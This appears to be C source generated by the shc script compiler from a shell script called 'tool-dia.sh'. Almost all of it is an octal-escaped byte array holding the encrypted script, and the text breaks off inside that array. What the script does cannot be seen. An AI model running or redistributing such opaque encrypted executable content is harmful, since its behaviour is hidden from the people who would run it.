#if 0
	shc Version 3.8.9b, Generic Script Compiler
	Copyright (c) 1994-2015 Francisco Rosales <frosal@fi.upm.es>

	shc -f tool-dia.sh 
#endif

static  char data [] = 
#define      chk2_z	19
#define      chk2	((&data[4]))
	"\105\301\260\111\224\062\266\201\343\117\350\352\363\032\373\055"
	"\030\332\161\157\001\301\067\067"
#define      text_z	9997
#define      text	((&data[574]))
	"\300\357\071\373\050\146\152\247\332\356\146\241\300\365\106\047"
	"\213\223\245\140\212\167\240\317\070\121\031\157\036\121\307\336"
	"\100\000\332\151\146\104\021\100\063\167\342\364\155\050\033\370"
	"\274\300\130\106\067\371\026\160\112\057\337\150\201\246\106\302"
	"\247\041\053\016\145\075\117\231\264\061\215\041\132\250\031\027"
	"\151\161\136\241\152\164\021\265\244\361\035\046\230\144\350\077"
	"\205\024\115\353\121\234\204\005\316\022\047\051\272\100\100\043"
	"\262\236\304\035\023\325\322\267\306\360\335\137\125\306\236\332"
	"\332\354\306\053\210\113\061\127\135\130\200\027\231\300\073\114"
	"\136\377\152\161\325\074\051\234\055\007\373\202\315\232\135\250"
	"\206\044\324\017\157\005\146\315\136\346\345\370\247\040\105\006"
	"\040\257\167\365\354\241\222\031\250\215\234\166\047\372\037\256"
	"\036\363\275\215\371\043\133\127\012\100\120\262\140\225\270\201"
	"\104\060\166\061\321\010\113\172\226\347\361\276\341\020\154\377"
	"\003\051\215\374\115\351\124\130\051\244\012\212\072\302\013\177"
	"\363\202\260\304\213\373\077\041\343\060\340\305\101\114\305\104"
	"\166\123\101\304\074\225\034\145\072\047\357\164\352\373\364\335"
	"\175\244\241\010\240\341\052\204\022\013\111\123\130\017\227\316"
	"\142\331\223\237\157\260\004\251\327\364\036\301\360\022\236\155"
	"\267\100\166\130\042\241\335\064\254\046\207\004\066\037\323\231"
	"\370\146\070\147\026\074\021\356\061\057\257\041\102\116\217\372"
	"\217\006\122\261\247\057\346\123\126\155\127\215\215\052\046\206"
	"\220\136\356\247\233\377\225\315\057\105\357\162\224\176\154\043"
	"\204\277\325\053\357\273\177\106\051\326\323\266\001\371\074\222"
	"\130\053\071\363\052\317\300\132\025\257\314\251\056\071\315\262"
	"\370\243\336\347\136\135\055\210\064\001\076\065\372\173\310\122"
	"\246\001\106\321\321\007\053\346\266\370\220\345\061\135\230\052"
	"\000\166\022\137\324\100\347\011\101\046\077\074\241\007\217\110"
	"\011\325\032\333\334\105\301\223\076\121\170\157\257\020\232\260"
	"\207\254\017\134\354\367\146\055\035\245\151\277\255\371\010\267"
	"\316\042\222\253\147\123\077\246\245\270\026\125\311\260\006\121"
	"\134\026\255\110\015\024\166\053\271\340\352\147\331\362\036\250"
	"\024\260\124\174\004\223\042\252\114\070\000\025\350\006\147\105"
	"\034\025\215\051\051\004\124\343\344\077\112\275\061\151\146\106"
	"\031\272\303\036\116\346\131\340\041\003\026\061\144\273\102\363"
	"\101\207\041\022\141\050\231\004\153\322\322\253\336\125\216\315"
	"\335\151\305\206\166\147\017\302\174\056\167\275\264\356\005\323"
	"\256\047\373\223\144\271\006\004\002\345\025\023\347\070\341\340"
	"\132\125\106\047\372\142\231\225\322\302\212\245\347\303\163\300"
	"\343\043\071\103\171\325\246\313\227\201\343\150\173\373\200\276"
	"\040\260\374\035\150\350\215\343\150\221\221\311\015\263\065\123"
	"\101\301\134\254\350\345\072\002\375\237\002\173\303\263\134\261"
	"\034\140\242\002\051\107\260\017\146\374\036\354\102\112\217\151"
	"\344\354\002\245\256\210\204\300\333\252\054\016\211\272\257\267"
	"\367\032\125\140\101\111\117\054\321\150\375\151\314\225\355\135"
	"\235\327\371\124\037\015\072\325\047\231\313\243\123\054\202\317"
	"\146\115\017\274\360\131\336\156\063\166\113\223\340\311\147\135"
	"\116\231\154\307\173\276\303\367\224\246\030\266\172\343\247\066"
	"\235\052\025\203\263\242\040\126\043\311\066\046\116\005\320\341"
	"\353\205\300\250\017\014\106\076\325\311\041\034\351\063\020\054"
	"\317\355\317\143\204\330\204\151\013\030\002\331\170\157\226\247"
	"\300\174\204\007\113\124\262\120\050\310\342\233\277\323\060\322"
	"\355\330\210\356\074\315\371\306\023\335\257\053\346\207\351\004"
	"\014\120\155\124\153\076\046\061\134\052\244\326\321\232\245\045"
	"\223\212\070\106\010\150\225\066\277\072\173\042\075\245\240\146"
	"\310\013\235\226\110\177\034\243\346\122\012\123\235\217\160\331"
	"\160\071\133\106\211\274\103\366\263\214\101\270\175\027\047\261"
	"\334\353\067\013\073\341\210\014\321\135\130\223\025\005\223\150"
	"\071\021\245\300\267\017\346\200\123\361\273\053\157\206\116\177"
	"\043\101\065\255\224\023\110\203\315\255\242\143\176\345\203\225"
	"\244\307\377\242\205\023\024\056\132\075\124\317\003\130\144\323"
	"\106\377\045\062\132\211\305\374\157\016\377\362\130\105\011\202"
	"\263\110\211\173\276\360\025\370\006\167\352\270\101\061\310\063"
	"\143\341\337\223\050\372\257\134\326\025\300\032\014\264\043\024"
	"\346\270\310\172\231\144\072\113\032\215\105\234\332\102\062\171"
	"\320\240\004\046\027\327\123\077\345\346\275\021\161\077\233\075"
	"\254\355\340\336\312\300\155\126\363\205\054\004\216\141\056\374"
	"\232\332\052\206\101\363\015\000\220\201\340\062\107\020\132\073"
	"\164\211\177\326\202\316\245\350\314\076\340\371\000\111\122\202"
	"\120\030\013\212\111\005\373\216\223\325\215\200\205\123\271\176"
	"\220\040\327\332\172\107\327\150\353\131\335\152\134\006\107\350"
	"\204\213\044\357\026\120\064\231\150\267\076\211\161\040\246\277"
	"\347\250\072\231\025\000\316\020\331\233\010\260\137\251\063\162"
	"\065\256\315\227\327\274\034\303\061\030\320\237\166\307\046\155"
	"\331\034\226\241\363\362\300\044\374\042\367\032\067\362\020\062"
	"\147\022\243\222\125\012\151\332\036\023\253\232\123\271\273\057"
	"\134\252\312\145\053\133\072\115\061\245\332\141\211\210\303\277"
	"\362\242\377\062\067\120\156\306\314\151\373\227\057\333\230\206"
	"\012\006\253\211\277\154\331\253\365\175\175\026\210\063\353\146"
	"\246\044\344\034\314\326\300\172\213\322\375\111\305\330\075\255"
	"\277\356\336\263\015\006\235\263\241\311\253\053\134\076\054\200"
	"\263\014\011\123\044\062\223\316\330\166\326\010\075\173\367\354"
	"\215\315\134\322\077\115\363\144\267\271\133\020\332\025\225\017"
	"\341\004\361\337\123\377\346\302\302\352\207\273\244\361\036\026"
	"\273\272\237\057\147\233\114\167\060\122\027\111\221\115\271\365"
	"\242\307\112\230\206\173\265\130\147\166\336\077\314\236\004\311"
	"\227\135\030\150\341\246\333\242\257\175\041\026\021\242\100\013"
	"\074\312\150\017\161\253\265\362\051\337\254\147\052\033\070\316"
	"\172\141\157\211\313\067\264\200\311\072\305\014\304\113\120\254"
	"\163\125\330\224\101\173\105\225\176\241\352\245\127\244\166\161"
	"\062\323\111\102\262\056\160\230\233\151\162\026\232\337\305\150"
	"\107\145\154\137\042\321\316\172\305\032\265\242\166\322\102\115"
	"\064\063\142\033\123\252\307\174\206\246\047\046\141\075\257\017"
	"\314\043\120\213\044\377\226\206\032\207\202\144\053\167\217\152"
	"\272\313\165\137\121\061\152\133\154\260\352\311\024\341\077\321"
	"\166\305\055\327\215\150\361\204\372\271\135\217\157\144\065\206"
	"\204\245\021\014\113\217\213\057\361\034\157\164\055\146\321\134"
	"\310\124\320\106\143\257\031\346\254\244\304\267\207\304\114\214"
	"\047\061\157\016\336\064\255\031\277\067\216\224\017\330\057\172"
	"\063\155\213\335\367\000\076\367\233\147\044\102\322\247\217\173"
	"\277\037\275\156\307\071\047\144\203\312\327\361\075\022\222\163"
	"\306\323\041\154\276\152\046\021\345\144\200\272\236\133\364\065"
	"\120\032\041\355\317\241\305\173\044\365\300\332\320\176\113\354"
	"\101\346\067\046\274\027\245\116\003\333\333\012\140\101\105\127"
	"\226\060\220\263\204\136\271\076\377\333\015\231\064\373\261\152"
	"\073\157\102\077\226\360\070\251\330\115\216\271\342\176\067\073"
	"\100\061\265\117\376\137\071\233\063\007\043\076\326\247\254\143"
	"\011\021\125\307\234\202\124\256\061\240\377\017\176\050\063\116"
	"\261\155\366\327\226\325\363\035\376\232\213\117\265\210\374\322"
	"\221\134\115\003\330\071\201\115\243\203\076\316\166\360\207\307"
	"\207\026\021\064\010\004\120\314\362\357\106\205\103\101\171\112"
	"\362\235\341\061\225\311\263\301\110\032\216\374\212\167\212\244"
	"\230\071\062\310\222\264\312\033\132\347\252\121\221\265\066\207"
	"\177\161\070\244\371\153\151\005\313\264\102\303\327\121\003\265"
	"\353\153\176\057\000\252\031\223\235\267\345\316\200\173\103\023"
	"\001\102\214\373\056\163\163\276\123\376\144\361\270\125\101\267"
	"\041\275\134\046\272\353\235\374\223\202\037\342\277\352\230\377"
	"\164\042\000\167\022\341\066\170\313\076\243\255\324\251\120\017"
	"\202\254\067\057\002\074\103\156\123\021\004\020\033\301\302\231"
	"\146\111\043\267\130\303\105\150\270\154\000\337\101\320\321\335"
	"\207\016\162\170\201\132\124\266\300\221\177\144\146\152\133\161"
	"\221\334\053\044\374\260\147\011\067\304\171\262\007\010\230\335"
	"\337\161\245\363\210\223\371\273\260\201\030\326\334\347\316\110"
	"\103\131\150\237\372\357\146\015\335\115\337\126\173\262\263\226"
	"\261\330\316\034\142\105\342\307\177\217\176\351\056\123\034\314"
	"\015\244\326\204\306\017\342\251\326\133\114\154\270\302\221\367"
	"\216\157\147\306\221\137\311\205\067\250\145\343\230\137\154\313"
	"\312\124\371\003\102\237\277\035\213\043\127\065\367\111\311\176"
	"\170\075\221\022\123\222\241\001\067\263\071\031\050\237\362\253"
	"\130\205\003\124\060\110\313\072\141\300\145\262\130\145\112\325"
	"\366\343\334\163\070\004\102\311\300\051\337\353\377\303\305\315"
	"\241\377\244\277\251\123\201\164\354\067\372\122\331\010\024\127"
	"\021\336\345\255\333\241\255\045\335\143\006\353\320\364\141\041"
	"\167\312\214\001\336\344\061\365\057\230\026\372\133\205\325\164"
	"\075\006\215\247\131\233\107\131\021\324\170\272\157\347\155\345"
	"\026\136\031\352\047\037\142\335\364\114\310\041\023\035\270\155"
	"\056\316\336\127\062\340\233\317\271\005\324\026\035\122\127\110"
	"\111\125\376\215\025\133\043\114\104\370\171\344\267\333\101\256"
	"\164\123\201\077\004\355\260\056\372\063\135\072\347\316\322\076"
	"\231\067\045\275\100\373\272\045\206\223\137\016\344\075\174\034"
	"\340\130\304\157\054\345\327\235\333\373\231\264\110\012\230\113"
	"\135\230\267\275\351\361\144\267\144\237\007\120\370\041\372\035"
	"\220\244\310\373\001\327\246\322\034\202\002\232\160\055\307\374"
	"\154\313\322\242\044\355\005\317\141\027\125\310\134\110\347\167"
	"\070\034\330\357\300\050\031\006\312\374\003\156\224\223\164\146"
	"\271\263\126\140\156\001\152\351\036\132\016\270\373\347\060\147"
	"\171\247\350\305\152\372\360\215\264\062\122\015\077\064\145\077"
	"\227\062\173\001\212\245\210\205\355\316\305\012\002\266\335\202"
	"\334\022\122\101\053\205\311\266\005\233\321\234\371\251\174\372"
	"\145\160\057\164\122\103\256\244\152\041\144\165\001\330\231\357"
	"\275\177\045\334\252\170\350\010\161\311\246\254\333\227\104\367"
	"\352\166\006\221\077\100\107\064\016\376\205\176\076\260\162\272"
	"\262\373\112\357\160\161\017\022\154\307\220\347\041\324\030\344"
	"\351\162\361\236\325\204\254\075\124\252\164\001\003\112\271\135"
	"\374\204\234\225\355\242\251\337\154\366\113\356\360\237\017\022"
	"\206\175\020\163\301\134\123\032\041\047\013\322\267\361\000\117"
	"\014\231\310\050\333\210\323\257\131\344\242\345\207\235\356\275"
	"\224\035\170\201\342\104\246\202\054\011\342\255\036\122\152\362"
	"\014\200\046\243\242\230\324\356\200\121\263\313\303\313\070\032"
	"\026\053\063\215\042\023\304\070\074\275\311\000\354\276\244\312"
	"\125\240\252\154\222\370\071\121\132\371\263\155\106\261\204\207"
	"\355\051\241\324\030\271\141\366\104\073\120\264\357\003\027\273"
	"\346\024\075\265\005\055\372\375\121\163\106\313\005\326\235\160"
	"\211\214\277\242\255\034\021\042\333\330\117\226\006\171\071\340"
	"\050\037\025\132\254\247\017\215\215\121\366\024\260\315\052\200"
	"\210\264\105\124\116\247\053\166\211\123\334\306\331\163\070\257"
	"\377\324\134\014\041\300\014\126\041\322\360\155\300\077\351\011"
	"\327\336\075\060\215\057\363\133\054\354\332\002\103\267\237\100"
	"\377\223\031\001\236\355\101\342\134\225\222\347\133\343\055\073"
	"\043\051\113\047\036\352\073\247\334\073\105\372\132\142\063\146"
	"\066\344\001\124\346\032\323\014\313\172\371\353\134\336\213\214"
	"\011\241\362\240\227\243\360\211\232\141\232\133\325\123\020\373"
	"\051\252\042\001\374\007\234\023\313\261\121\163\231\257\325\344"
	"\170\231\275\003\314\274\012\266\250\071\346\274\334\361\035\313"
	"\226\327\320\105\217\053\362\121\341\200\261\147\307\225\171\144"
	"\063\205\237\262\123\151\060\134\135\212\301\342\153\370\005\347"
	"\333\342\325\162\200\374\156\175\311\120\025\221\261\013\026\301"
	"\147\075\207\261\366\022\103\353\320\274\163\202\222\336\324\372"
	"\005\361\277\313\126\130\304\042\120\363\375\153\105\106\226\323"
	"\371\341\100\173\373\247\145\131\073\131\351\115\205\361\327\250"
	"\025\323\257\301\132\042\374\021\034\253\306\327\054\377\057\314"
	"\112\205\306\113\161\051\252\263\302\022\204\001\333\057\025\015"
	"\031\022\106\244\120\103\345\034\004\115\073\073\156\075\366\221"
	"\113\050\254\070\220\043\024\016\334\372\340\213\274\141\121\347"
	"\144\264\342\111\205\310\121\151\165\343\041\003\051\323\237\370"
	"\124\341\333\123\354\352\313\126\212\132\236\266\260\251\370\067"
	"\334\042\036\271\147\312\362\114\106\376\323\312\144\170\331\035"
	"\227\342\370\164\131\226\124\146\074\024\167\036\225\256\147\203"
	"\153\167\370\323\301\076\323\053\046\171\144\342\171\023\150\336"
	"\273\026\210\200\237\141\003\272\061\102\214\161\326\211\274\125"
	"\342\240\122\350\073\357\146\257\237\230\240\364\324\167\275\032"
	"\106\276\220\151\361\343\303\177\124\270\266\077\053\354\005\237"
	"\310\236\037\067\351\263\142\075\230\211\271\220\006\222\056\245"
	"\046\271\057\206\050\236\136\323\227\333\350\215\254\345\257\205"
	"\377\017\024\031\314\257\067\324\371\324\050\213\306\103\062\166"
	"\170\357\144\057\321\363\140\021\121\377\317\073\174\004\254\251"
	"\376\076\255\354\262\373\365\323\165\257\070\314\337\022\030\012"
	"\245\105\227\326\324\171\127\217\252\313\002\343\226\015\107\226"
	"\006\027\323\226\314\214\061\061\076\321\230\177\321\226\347\376"
	"\220\067\304\330\360\120\124\125\100\166\255\261\354\022\215\303"
	"\156\237\006\211\263\333\253\174\245\115\044\165\211\021\323\246"
	"\034\320\216\135\235\022\072\141\030\263\206\045\371\171\003\175"
	"\360\164\035\270\201\160\166\014\070\346\364\270\266\005\011\306"
	"\320\301\033\010\100\005\273\211\337\307\207\001\024\025\326\327"
	"\024\373\042\001\372\227\211\152\003\040\361\002\146\266\361\057"
	"\055\207\040\237\016\067\131\325\300\151\107\235\356\270\144\013"
	"\157\233\360\266\055\150\015\273\050\370\265\343\365\212\157\130"
	"\320\303\215\144\351\316\152\176\115\025\130\177\223\140\367\116"
	"\243\121\224\227\223\346\051\020\134\140\064\377\031\121\166\157"
	"\364\221\051\217\333\173\147\042\222\167\036\272\046\271\340\301"
	"\062\000\131\021\261\372\307\230\013\056\024\357\134\311\263\162"
	"\001\232\136\225\041\024\000\356\012\114\251\365\251\051\016\116"
	"\075\220\345\005\203\016\030\212\221\135\106\060\076\152\177\355"
	"\026\177\105\251\110\326\154\142\360\153\275\225\303\316\226\032"
	"\024\077\156\106\173\244\205\270\264\242\330\162\245\337\016\174"
	"\011\101\135\354\202\146\212\367\300\017\363\227\331\300\161\323"
	"\050\300\062\236\065\177\034\352\144\067\255\173\300\375\263\230"
	"\040\142\273\166\133\034\302\040\134\041\011\321\332\102\301\001"
	"\126\347\137\055\236\355\004\127\036\073\052\243\005\034\274\350"
	"\255\137\051\223\347\207\131\226\340\334\314\160\340\115\175\177"
	"\355\231\022\107\171\203\056\344\211\250\253\320\133\135\026\301"
	"\335\074\347\156\137\111\225\006\023\005\213\322\067\044\223\101"
	"\110\367\301\062\141\063\316\343\227\043\005\135\207\272\210\042"
	"\061\303\343\015\347\377\063\337\300\377\154\240\065\031\364\204"
	"\216\175\003\355\054\142\342\277\001\057\202\334\151\202\254\114"
	"\063\374\065\000\201\120\042\026\200\230\363\320\302\274\034\127"
	"\166\230\115\056\210\117\334\202\034\334\252\062\271\345\333\221"
	"\104\172\036\261\003\057\016\152\064\071\237\121\046\032\254\265"
	"\023\221\202\216\050\026\356\174\165\050\314\114\131\153\211\161"
	"\121\174\206\103\051\076\245\317\177\052\014\000\324\301\204\371"
	"\301\370\364\007\164\153\071\027\251\066\122\011\004\363\354\114"
	"\044\051\112\073\274\030\262\127\244\171\034\237\244\232\042\113"
	"\232\242\017\157\201\015\316\016\377\314\053\345\202\167\005\273"
	"\036\347\300\216\003\020\375\076\225\163\116\037\002\024\200\004"
	"\156\066\013\375\075\340\264\001\352\265\376\233\322\057\152\143"
	"\114\052\254\331\147\272\010\237\204\203\043\200\116\325\043\126"
	"\046\356\163\071\010\142\061\270\255\246\137\314\376\036\204\303"
	"\365\150\347\123\150\021\300\302\364\300\355\377\333\212\252\234"
	"\254\130\126\134\031\005\244\335\212\073\211\341\073\273\247\053"
	"\206\301\157\344\111\066\327\143\224\034\040\200\061\302\001\057"
	"\004\264\311\241\024\071\031\031\263\211\253\337\307\014\260\210"
	"\274\254\122\177\313\003\171\144\163\142\067\033\075\064\320\263"
	"\135\241\343\226\127\162\101\370\146\006\201\362\012\257\164\341"
	"\067\147\236\171\303\275\121\363\345\353\233\307\036\005\216\006"
	"\123\143\305\346\021\067\013\056\310\262\216\156\305\235\261\356"
	"\110\164\232\015\364\213\352\025\362\036\240\034\222\204\257\260"
	"\156\276\242\312\030\372\353\115\346\325\060\217\266\131\106\335"
	"\076\211\063\153\321\133\047\374\242\350\246\045\346\242\176\263"
	"\360\150\210\155\223\102\315\255\331\114\202\301\113\162\211\257"
	"\347\112\247\171\345\347\151\320\052\166\224\247\017\376\041\227"
	"\120\161\206\157\234\207\166\006\040\075\337\244\206\065\355\344"
	"\024\314\152\360\037\066\105\212\006\252\177\041\325\073\336\063"
	"\160\347\015\210\042\105\371\215\347\350\353\032\176\304\316\354"
	"\017\114\116\327\372\255\364\334\211\376\133\217\124\331\163\225"
	"\141\143\137\334\316\174\273\313\261\230\234\203\205\225\133\363"
	"\306\212\101\262\034\364\111\110\021\360\373\134\024\327\315\246"
	"\365\017\256\042\312\261\354\373\134\345\041\146\371\136\332\042"
	"\110\176\176\352\150\214\040\325\105\000\176\040\046\273\337\366"
	"\251\377\353\222\073\327\245\210\154\156\267\225\357\373\206\001"
	"\163\227\273\053\263\113\342\146\213\256\106\356\051\251\352\071"
	"\330\250\160\266\044\205\211\044\051\027\037\153\351\350\060\244"
	"\231\053\112\342\303\307\217\161\046\264\045\005\070\320\143\005"
	"\371\237\157\222\221\155\252\222\234\367\376\251\037\230\241\302"
	"\322\353\327\025\265\153\165\160\001\373\340\332\064\142\206\026"
	"\260\071\027\262\154\231\044\014\302\154\313\037\056\233\244\205"
	"\333\163\245\364\331\103\224\332\134\367\023\346\305\127\116\211"
	"\346\230\324\362\140\162\164\010\062\116\041\157\012\366\161\154"
	"\267\144\376\230\226\013\072\106\255\305\216\345\177\274\255\155"
	"\132\074\316\122\034\250\061\304\052\333\052\304\230\142\123\016"
	"\264\170\365\335\372\003\204\316\101\035\022\164\177\017\024\205"
	"\173\341\033\154\046\272\046\203\212\072\037\267\170\173\336\072"
	"\173\127\323\322\313\271\050\353\174\256\005\224\232\372\063\117"
	"\142\210\207\133\022\342\371\313\353\076\322\275\144\171\257\042"
	"\123\255\351\237\145\236\142\264\213\300\160\101\043\064\051\300"
	"\277\246\150\336\223\105\016\265\065\117\103\242\350\043\070\223"
	"\141\100\325\163\245\321\343\241\272\245\277\311\370\325\153\237"
	"\042\303\173\050\045\065\360\035\022\330\145\044\024\033\153\327"
	"\032\377\066\037\046\337\003\250\214\373\255\062\251\035\053\316"
	"\100\341\307\233\314\357\113\271\313\115\315\343\324\260\066\341"
	"\274\267\343\217\067\312\157\111\355\171\014\104\311\342\167\220"
	"\237\212\206\231\044\051\270\246\137\371\317\202\121\077\053\212"
	"\165\156\200\254\134\363\045\054\276\062\122\246\355\165\011\263"
	"\013\005\066\133\373\032\314\256\163\210\070\307\315\021\073\306"
	"\363\355\042\057\101\207\141\121\224\176\063\043\262\326\105\373"
	"\053\033\062\270\167\312\026\027\157\216\247\261\003\245\313\041"
	"\065\163\222\054\055\021\317\263\054\364\361\027\061\363\224\350"
	"\342\173\122\337\011\047\110\156\130\177\174\306\006\363\117\241"
	"\000\372\262\366\043\040\253\374\014\123\166\247\030\103\014\103"
	"\335\276\350\050\172\351\072\020\217\011\111\227\104\350\172\033"
	"\166\113\273\154\036\335\015\062\211\145\303\210\107\071\155\227"
	"\345\252\022\241\366\072\171\107\132\227\242\330\370\031\101\341"
	"\131\265\367\054\244\265\162\244\323\020\313\265\006\337\310\116"
	"\172\240\315\350\164\175\045\323\164\077\345\154\046\151\155\200"
	"\311\053\167\044\210\136\063\377\045\340\130\006\001\043\262\263"
	"\321\253\310\242\275\166\104\132\316\345\043\214\305\307\332\074"
	"\247\343\112\244\267\056\260\205\171\134\310\000\164\126\125\030"
	"\254\357\077\257\263\245\261\131\136\205\105\115\045\044\375\201"
	"\023\056\216\177\375\244\356\017\035\044\254\316\023\067\102\112"
	"\230\126\146\016\017\044\143\142\037\166\270\143\256\233\332\017"
	"\327\273\220\115\111\161\034\221\107\015\257\177\307\037\236\120"
	"\224\276\033\364\056\162\157\311\224\024\045\346\111\240\217\041"
	"\245\362\023\005\242\252\207\025\252\125\236\115\222\053\043\364"
	"\040\273\026\111\113\360\047\134\041\223\343\253\207\141\034\142"
	"\265\143\014\246\272\052\022\072\034\115\241\023\324\357\343\300"
	"\177\356\327\223\377\240\370\351\034\361\204\005\002\371\347\104"
	"\104\121\140\220\342\305\077\163\345\234\354\021\175\124\130\214"
	"\037\137\235\333\256\332\353\354\352\144\237\015\060\242\245\340"
	"\211\153\262\230\235\035\265\050\002\333\165\243\307\114\156\152"
	"\353\045\255\011\225\324\127\242\242\371\235\101\007\260\007\073"
	"\353\126\223\337\233\041\356\143\075\100\276\206\007\170\066\055"
	"\225\031\227\367\207\243\345\353\041\245\364\043\062\307\206\015"
	"\345\365\077\206\315\272\253\232\030\264\312\364\270\045\262\273"
	"\105\246\256\374\142\017\355\041\142\314\060\145\157\125\225\210"
	"\117\371\224\233\351\270\002\303\321\213\134\350\154\252\005\253"
	"\201\230\274\276\167\121\136\366\146\224\042\276\016\302\025\065"
	"\011\142\115\032\251\330\071\177\374\051\316\250\152\045\222\132"
	"\202\226\275\141\123\354\265\030\336\107\114\325\160\166\317\073"
	"\305\377\062\174\071\016\171\201\246\276\206\102\135\167\367\302"
	"\234\132\135\043\364\340\270\113\025\023\304\101\210\174\176\027"
	"\323\157\304\223\154\165\107\144\363\370\204\372\110\362\056\044"
	"\223\045\140\240\054\216\234\327\057\067\045\301\212\057\354\135"
	"\051\141\103\166\347\176\375\151\363\163\335\202\043\312\233\203"
	"\302\125\233\151\044\227\202\377\247\135\310\111\372\010\063\312"
	"\116\004\261\216\202\112\366\055\311\151\205\127\023\130\032\165"
	"\171\374\106\016\320\265\037\051\123\147\370\120\045\220\230\233"
	"\347\375\340\122\242\103\162\233\264\221\324\166\021\130\124\227"
	"\035\366\126\145\046\325\367\330\026\047\113\006\075\161\106\001"
	"\066\332\144\145\356\323\054\245\116\034\127\316\325\172\022\262"
	"\044\023\264\102\056\120\365\003\115\341\046\336\025\146\333\213"
	"\140\274\030\103\233\115\346\177\246\026\337\256\025\116\232\143"
	"\130\227\354\042\157\021\057\273\007\001\170\325\116\014\371\152"
	"\367\341\261\236\355\331\235\054\331\142\272\356\324\131\171\203"
	"\153\312\146\310\274\323\332\377\206\204\072\054\310\043\117\217"
	"\337\020\336\333\331\175\147\055\006\345\360\231\177\247\174\337"
	"\241\120\303\061\225\033\072\053\071\164\337\050\036\317\232\206"
	"\115\345\335\325\013\006\002\040\025\032\143\357\263\300\376\041"
	"\031\067\255\276\166\215\000\150\044\312\175\061\272\123\045\322"
	"\113\035\161\024\110\257\031\210\110\047\164\176\167\336\350\073"
	"\305\026\364\020\317\114\027\144\134\011\257\260\144\031\361\274"
	"\030\076\034\376\166\167\120\116\264\056\226\233\333\062\231\373"
	"\131\171\366\270\150\367\000\322\060\065\163\170\043\354\071\143"
	"\217\123\321\240\036\020\056\151\356\142\060\364\053\275\053\250"
	"\155\227\154\051\252\302\263\370\134\111\126\324\262\263\141\312"
	"\151\263\101\217\335\333\322\141\057\361\153\364\250\106\365\001"
	"\322\075\052\027\023\030\213\020\056\314\142\074\002\005\324\104"
	"\171\042\367\225\356\355\271\011\172\043\062\100\303\303\367\025"
	"\362\150\372\266\215\141\013\322\330\356\002\313\342\005\033\127"
	"\167\223\305\336\340\376\143\174\012\217\207\016\250\054\307\004"
	"\104\136\361\114\071\343\312\071\106\251\157\020\343\237\151\171"
	"\305\111\046\310\100\332\034\347\340\302\275\102\152\315\245\247"
	"\062\113\013\272\277\172\335\026\265\007\130\061\200\141\170\213"
	"\114\122\173\066\032\213\145\332\154\105\027\305\010\314\224\021"
	"\123\156\205\125\265\135\133\215\371\317\246\340\100\177\075\132"
	"\233\155\206\056\176\125\064\234\115\046\166\267\214\343\232\216"
	"\241\350\355\066\030\305\363\005\013\207\034\122\037\040\363\130"
	"\216\371\267\132\111\325\050\364\050\031\275\046\004\005\031\212"
	"\041\035\132\335\120\034\036\003\220\253\273\211\340\361\000\364"
	"\035\106\306\243\274\257\311\037\212\173\035\253\007\100\314\354"
	"\370\254\034\112\130\103\340\166\000\355\231\317\052\343\356\203"
	"\012\350\122\306\367\251\173\215\200\052\103\232\241\326\074\220"
	"\326\164\253\160\073\163\262\021\163\217\232\122\305\157\335\361"
	"\303\156\076\353\076\021\347\314\374\360\357\154\344\304\156\334"
	"\335\245\106\161\072\303\303\106\233\025\251\145\077\006\243\242"
	"\171\300\333\110\063\255\033\270\057\010\177\167\031\200\331\173"
	"\102\034\127\227\062\264\372\133\357\045\151\226\326\132\112\253"
	"\260\006\067\203\277\302\142\101\113\265\073\035\123\365\141\033"
	"\073\367\264\251\360\272\141\145\145\123\310\364\232\200\222\315"
	"\025\206\025\314\030\052\144\375\034\010\347\161\057\345\215\206"
	"\170\023\216\326\233\362\316\330\060\022\177\375\266\050\144\073"
	"\113\175\133\004\136\063\366\027\121\061\254\013\300\242\323\032"
	"\372\320\174\031\116\121\336\222\132\157\107\266\261\306\307\063"
	"\007\166\052\355\261\166\156\354\064\114\345\076\371\264\203\174"
	"\134\122\354\225\065\261\105\026\217\123\015\336\343\357\127\011"
	"\053\034\252\367\231\377\206\120\044\150\030\340\252\042\163\003"
	"\012\233\300\067\223\067\313\272\210\007\103\253\214\373\043\304"
	"\232\107\362\372\252\154\017\032\231\275\132\265\176\104\152\032"
	"\174\372\325\354\237\337\326\122\271\355\021\070\246\037\001\371"
	"\206\002\106\023\121\135\357\170\357\211\263\007\204\025\353\175"
	"\141\215\232\116\042\064\325\172\261\153\027\031\022\255\022\323"
	"\251\222\134\375\276\131\134\015\114\201\336\172\230\007\374\157"
	"\266\144\227\125\122\115\233\046\203\340\134\322\005\337\143\176"
	"\145\116\111\002\345\343\237\341\114\031\270\121\136\207\272\354"
	"\136\273\332\307\030\246\266\336\353\146\160\115\075\305\021\231"
	"\225\120\364\211\147\257\005\356\347\163\100\070\261\223\131\270"
	"\152\027\210\361\135\325\062\252\041\011\263\207\227\171\365\326"
	"\145\243\363\273\046\051\344\167\014\346\211\231\102\060\023\337"
	"\324\000\364\005\241\342\334\173\312\146\252\144\361\064\054\364"
	"\344\323\204\327\152\220\361\332\142\255\100\055\336\020\222\324"
	"\163\057\177\337\077\043\173\143\214\063\356\020\322\336\337\106"
	"\172\157\170\225\210\000\314\032\212\032\357\047\075\132\333\062"
	"\233\205\050\037\346\324\134\326\306\053\273\373\304\304\252\156"
	"\217\246\264\354\271\075\154\155\045\046\240\075\111\200\243\373"
	"\141\024\274\356\116\151\202\154\350\273\166\366\274\203\332\051"
	"\375\270\145\054\302\162\016\125\351\364\107\007\335\151\006\050"
	"\217\352\015\243\123\301\012\234\225\334\356\236\075\274\024\147"
	"\073\340\125\005\011\053\077\335\001\217\361\101\067\163\051\214"
	"\342\201\244\157\372\370\135\263\006\131\341\302\321\351\341\341"
	"\265\152\070\263\356\145\126\275\256\151\371\141\360\314\346\132"
	"\151\350\057\367\131\023\044\055\033\256\227\051\100\064\241\246"
	"\067\136\070\026\142\013\065\227\344\154\072\132\356\216\051\342"
	"\050\323\121\101\317\217\001\342\273\170\114\211\320\155\262\243"
	"\256\143\016\343\033\026\372\136\152\320\263\070\031\162\147\317"
	"\076\256\305\103\054\253\371\007\371\307\363\320\151\107\030\115"
	"\317\147\123\073\070\304\115\215\111\173\344\221\074\025\351\140"
	"\044\177\163\130\136\154\323\367\375\300\335\346\360\070\302\255"
	"\346\221\213\021\103\301\251\374\137\274\261\214\140\241\301\114"
	"\225\015\026\124\221\346\201\170\235\007\060\040\062\123\361\202"
	"\330\355\166\127\040\020\322\256\156\231\305\270\066\027\122\370"
	"\202\221\351\077\165\357\010\142\000\353\135\164\361\121\002\136"
	"\272\261\075\136\107\377\036\116\243\050\107\111\211\207\341\313"
	"\325\244\044\364\267\313\000\154\265\072\074\223\077\335\247\144"
